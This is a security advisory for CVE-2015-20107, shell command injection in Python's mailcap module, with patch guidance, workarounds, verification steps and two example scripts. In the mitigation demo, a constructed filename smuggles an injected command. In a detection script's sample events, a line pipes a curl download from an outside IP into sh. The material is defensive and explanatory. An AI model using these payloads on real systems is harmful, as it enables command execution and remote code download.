CVE-2015-20107

7.6 HIGH

📋 TL;DR

Python's mailcap module builds shell command lines from the templates in the system mailcap file, splicing the caller-supplied filename, MIME type and parameters into the `%s`, `%t` and `%{name}` placeholders with no escaping. An application that passes untrusted input to mailcap.findmatch() therefore hands an attacker control of the resulting shell command: findmatch() itself runs any `test=` command of a matching entry through os.system(), and the command it returns is normally executed the same way. Attackers can execute arbitrary commands on affected systems. Applications using Python's mailcap module with user-provided filenames or arguments are vulnerable.

💻 Affected Systems

Products:
  • Python (CPython)
Versions: Python 3.10.8 and earlier (the CVE covers all CPython releases through 3.10.8; fixes were backported only to the 3.7, 3.8, 3.9 and 3.10 branches)
Operating Systems: All operating systems running affected Python versions
Default Config Vulnerable: ⚠️ Yes
Notes: Only exploitable when an application passes untrusted input to mailcap.findmatch(); the defect is in the module itself, not in any particular application. mailcap is deprecated since Python 3.11 (PEP 594) and removed in Python 3.13, so code that still imports it has to migrate regardless of this CVE.

📦 What is this software?

Python by Python

Python is a high-level, interpreted programming language known for its readability and versatility. It is widely used in web development, data science, automation, and scientific computing.

Learn more about Python →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Command execution as the user running the Python process; for a privileged or internet-facing service this means full system compromise, data theft, or ransomware deployment.

🟠

Likely Case

Limited command execution within application context, potentially leading to data leakage or privilege escalation.

🟢

If Mitigated

No impact if input validation is implemented or mailcap module is not used with untrusted data.

🌐 Internet-Facing: MEDIUM - Requires specific application usage patterns and untrusted input to mailcap.findmatch().
🏢 Internal Only: LOW - Most internal applications don't use mailcap module with untrusted input.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires an application that calls mailcap.findmatch() with attacker-controlled input (for example, the original name of an uploaded file). A public PoC exists in the Python bug tracker: the issue (bpo-24778) was reported in 2015, which is why the CVE carries a 2015 identifier, but the fix did not land until 2022.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Python 3.10.9, 3.9.16, 3.8.16, 3.7.16 (Python 3.11.0 and later already contain the fix)

Vendor Advisory: https://bugs.python.org/issue24778 (migrated to https://github.com/python/cpython/issues/68966)

Restart Required: Yes for running Python processes, which must be restarted (or redeployed) to load the patched module; no reboot is needed.

Instructions:

1. Upgrade Python to a patched version.
2. For Python 3.10.x: upgrade to 3.10.9+.
3. For Python 3.9.x: upgrade to 3.9.16+.
4. For Python 3.8.x: upgrade to 3.8.16+.
5. For Python 3.7.x: upgrade to 3.7.16+.

🔧 Temporary Workarounds

Input Validation (all platforms)

Validate all user input before passing it to mailcap.findmatch(): reject any filename, MIME type or parameter containing characters other than word characters and `@+=:,./-`. This is the rule the patched module enforces, refusing the input and returning (None, None) instead of escaping it.

Avoid mailcap.findmatch() with untrusted input (all platforms)

Do not pass user-provided filenames or arguments to mailcap.findmatch(). Write untrusted content to a safe temporary filename (tempfile) and pass that name instead; prefer this over shell-quoting the name yourself, because the mailcap template may already wrap `%s` in quotes.

🧯 If You Can't Patch

  • Implement strict input validation for all parameters passed to mailcap.findmatch()
  • Audit codebase for mailcap.findmatch() usage and ensure it's not called with untrusted input
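The substitution described in the TL;DR and the validation recommended in the workarounds above, as an added example: this is not CPython's mailcap source and not part of the advisory. It models the `%s` splice that findmatch() performs, shows the same unsafe-character rule the CPython fix uses, and shows the safe-temporary-filename route the fix's warning text recommends. The mailcap entry and the attacker-controlled filename are constructed for the demonstration.

```python
"""Added example (not CPython's mailcap source): why an unescaped filename in
a mailcap command template becomes shell injection, and two mitigations an
application can apply while it cannot patch. The mailcap entry and the
hostile filename below are constructed."""
import os
import re
import shlex
import tempfile

# Constructed mailcap entry, as one might appear in /etc/mailcap.
MAILCAP_VIEW_TEMPLATE = "xdg-open %s"

# Same character class CPython's fix uses to refuse input: anything other
# than word characters, non-ASCII text and @+=:,./- is treated as unsafe.
find_unsafe = re.compile(r'[^\xa1-\U0010FFFF\w@+=:,./-]').search


def subst_unpatched(template: str, filename: str) -> str:
    """Pre-fix behaviour (simplified): splice the filename in verbatim."""
    return template.replace("%s", filename)


def subst_patched(template: str, filename: str):
    """Post-fix behaviour (simplified): refuse, rather than escape, unsafe
    input. The real module also emits an UnsafeMailcapInput warning and
    findmatch() then returns (None, None)."""
    if find_unsafe(filename):
        return None
    return template.replace("%s", filename)


def subst_quoted(template: str, filename: str) -> str:
    """Application-side alternative: shell-quote the value before it is
    substituted, so the hostile name stays one argv element. Only works
    when the template does not already quote %s itself."""
    return template.replace("%s", shlex.quote(filename))


def safe_temp_copy(untrusted_name: str, data: bytes) -> str:
    """Mitigation the fix's warning recommends: never hand the user-chosen
    name to mailcap. Write the content under a safe temporary name and use
    that; only a whitelisted extension survives from the original name."""
    ext = os.path.splitext(untrusted_name)[1]
    suffix = ext if re.fullmatch(r"\.[A-Za-z0-9]{1,8}", ext) else ""
    fd, path = tempfile.mkstemp(suffix=suffix)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


ATTACKER_FILENAME = "report.pdf; id > /tmp/pwned #"  # constructed payload


def demo():
    """Return the three command lines produced for the same hostile name."""
    unpatched = subst_unpatched(MAILCAP_VIEW_TEMPLATE, ATTACKER_FILENAME)
    patched = subst_patched(MAILCAP_VIEW_TEMPLATE, ATTACKER_FILENAME)
    quoted = subst_quoted(MAILCAP_VIEW_TEMPLATE, ATTACKER_FILENAME)
    return unpatched, patched, quoted


if __name__ == "__main__":
    u, p, q = demo()
    print("unpatched:", u)   # os.system(u) would run `id > /tmp/pwned`
    print("patched:  ", p)   # None: refused
    print("quoted:   ", q)   # one quoted argument, nothing injected
```

Run it as a script to see the three command lines side by side. The unpatched string is exactly what an os.system() call would hand to /bin/sh, which is why the injected `id > /tmp/pwned` runs; the patched path refuses the name outright, and safe_temp_copy() sidesteps the problem by never letting the user-chosen name reach the template at all.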

🔍 How to Verify

Check if Vulnerable:

Check the Python version with `python3 --version`. If it is 3.7.0 to 3.7.15, 3.8.0 to 3.8.15, 3.9.0 to 3.9.15, 3.10.0 to 3.10.8, or anything older than 3.7, the interpreter is vulnerable. A vulnerable interpreter only matters if code on the host calls mailcap.findmatch() with untrusted input, so pair the version check with a search of the codebase for that call.

Check Version:

python3 --version

Verify Fix Applied:

After patching, verify the Python version is 3.7.16+, 3.8.16+, 3.9.16+, or 3.10.9+ (or 3.11+). The patched module defines the warning class mailcap.UnsafeMailcapInput, which unpatched releases lack, so its presence confirms the fixed module is the one being loaded.

📡 Detection & Monitoring

Log Indicators:

  • Unexpected /bin/sh children of Python processes, since os.system() runs the mailcap command through the shell
  • UnsafeMailcapInput warnings in application logs: a patched interpreter emits one and returns (None, None) whenever it refuses input, so a burst of them means someone is probing the call

Network Indicators:

  • Outbound connections from Python processes not expected to make network calls

SIEM Query:

Process creation events where the parent process is a Python interpreter, the child is `/bin/sh -c` (how os.system() runs the mailcap command), and the command line contains shell metacharacters a filename should never carry, such as `;`, `&&`, `$(`, backticks or redirection. Expect some noise: legitimate mailcap entries pipe into pagers, so tune the character list per host.
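The SIEM rule above implemented over process-creation events, as an added example that is not part of the advisory, so the logic can be tested before it is translated into a real query language. The event records are constructed JSON lines using the field names the rule refers to (parent_process, command_line); map them onto your own telemetry schema (auditd EXECVE, Sysmon event 1, EDR process events).

```python
"""Added example (not from the advisory): the detection rule run over
constructed process-creation events. Field names follow the rule text;
real telemetry will need a mapping step."""
import json
import re

# Metacharacters that should not appear in a filename handed to a viewer.
# A bare `|` is deliberately left out: legitimate mailcap entries pipe into
# pagers, so it would be pure noise.
INJECTION_PATTERN = re.compile(r";|&&|\|\||\$\(|`|>|<|\n")

# os.system() always runs the mailcap command via /bin/sh -c, so the child
# of interest is a shell whose -c string carries the substituted filename.
SHELL_RE = re.compile(r"(^|/)(sh|bash|dash|zsh)\s+-c\s+", re.ASCII)


def is_suspicious(event):
    """Apply the rule to one normalised process-creation event (a dict)."""
    parent = event.get("parent_process", "")
    cmd = event.get("command_line", "")
    if "python" not in parent.lower():
        return False
    if not SHELL_RE.search(cmd):
        return False
    return bool(INJECTION_PATTERN.search(cmd))


def scan(lines):
    """Return the matching events, in input order."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        if is_suspicious(event):
            hits.append(event)
    return hits


# Constructed events: one benign viewer launch with a safe temp name, one
# classic `;` injection, one command substitution, one non-Python parent,
# one Python child that is not a shell.
SAMPLE_EVENTS = """
{"ts":"2024-05-01T10:00:01Z","parent_process":"/usr/bin/python3","command_line":"/bin/sh -c 'xdg-open /tmp/tmpa1b2c3.pdf'"}
{"ts":"2024-05-01T10:00:02Z","parent_process":"/usr/bin/python3","command_line":"/bin/sh -c 'xdg-open report.pdf; id > /tmp/pwned #'"}
{"ts":"2024-05-01T10:00:03Z","parent_process":"/usr/bin/python3","command_line":"/bin/sh -c 'xdg-open $(curl http://198.51.100.7/x|sh)'"}
{"ts":"2024-05-01T10:00:04Z","parent_process":"/usr/bin/bash","command_line":"/bin/sh -c 'cat a; cat b'"}
{"ts":"2024-05-01T10:00:05Z","parent_process":"/usr/bin/python3","command_line":"/usr/bin/git status"}
"""

if __name__ == "__main__":
    for event in scan(SAMPLE_EVENTS.splitlines()):
        print("ALERT", event["ts"], event["command_line"])
```

Only the second and third events fire. The first is what a correctly written application produces after routing the upload through a safe temporary name, which is also the baseline to expect once the workarounds or the patch are in place.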
